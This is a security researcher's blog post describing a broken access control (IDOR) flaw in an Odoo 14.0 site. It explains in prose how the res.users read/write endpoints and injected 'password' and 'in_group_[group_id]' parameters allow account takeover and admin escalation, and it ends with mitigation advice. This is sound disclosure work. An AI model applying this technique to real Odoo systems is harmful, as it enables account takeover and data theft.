Critical Broken Access Control Exploitation in Odoo 14.0

Ryan Runako
MII Cyber Security Consulting Services
4 min readJan 17, 2024
BAC Illustration logo, source:”baclogosource

About a month ago, I discovered an intriguing broken access control vulnerability that could result in user or admin account takeover and privilege escalation in the Odoo app. Before I explain into how I found the vulnerability, let me provide an overview of Odoo.

What is Odoo?

Odoo is an open-source business management software suite that includes a variety of applications and modules for different business needs. It is designed to help companies manage their various business processes, such as accounting, inventory management, customer relationship management (CRM), human resources, e-commerce, and more. Odoo provides a modular approach, allowing businesses to choose and integrate the specific modules that meet their requirements.

Briefly put, Odoo is a service framework for developing website applications that enables the fulfillment of business needs through modules and plugins that can be installed as required, without the need for coding from scratch to meet various types of business management

Vulnerability

The vulnerability i found on production hospitality management website running odoo CRM Version 14.0, is IDOR on to view or edit user object, on user profile. Than i found some endpoint that can view all parameter and attribute for user model, and last this vulnerability lead to changing all other user password and privileges (user groups)

By default, Odoo does not check for user parameter requests within the user session. As a result, there is no authorization for changing user attributes or appending malicious parameters to the request body attributes.

POC (Proof Of Concept)

While i have low level user login i found a menu that can view and edit user profile attribute

Vulnerable Entry Point Menu

When i do get request on above image on burpsuite it provides the request on res.users/read and res.users/write endpoint to view user profile data and to change user attribute, as shown in the image below

default request for view and edit user’s data

After several enumerations, I discovered the /load.views endpoint. I then tested this method on the res.users model, and as expected, the request yielded all details about parameters and attributes on the res.users model.

res.users/load_views request

to simplify the response view, i use json viewer and approximately 800 attributes are available to manipulate each user attribute.

res.users/load_views on json viewer

Back with the /res.users/read endpoint, That can be seen in below picture I attempt to retrieve the user ID, name, password, login name, and group_id. The server provides a successful response with details of the current login name and group_id. As for the password, I am not entirely sure why the value form is blank, possibly due to the encryption mechanism. Nevertheless, it confirms that the parameter is valid for the res.users model.

Retrieve user other attributes

For the exploitation, I change the password for another user or my own by adding the “password” parameter with a preferred password value. After gathering all information about user model attributes from the above steps, I assign the administrative role to the user by including “in_group_[group_id]: true” to achieve privilege escalation to the admin role. the POC can be seen in below exploit POC figure.

User role and password exploit POC

Conclusion

With this type of vulnerability, an attacker can unauthorizedly change almost all data on the server. However, within my testing scope, I focused on the user model data, where I could gather all user information, perform account takeover by changing other user passwords, and gain admin privileges by adding administrative roles. This vulnerability could lead to data theft, account manipulation, and even functional failures in the application and server. Therefore, the use of All in one framework applications like Odoo still needs attention from a security standpoint. In the case I’ve shared, it is crucial to ensure proper authorization for each endpoint by aligning the resource access rights role with the user’s cookie to mitigate potential risks.

Reference

Open Source ERP and CRM | Odoo

API1:2023 Broken Object Level Authorization — OWASP API Security Top 10

--

--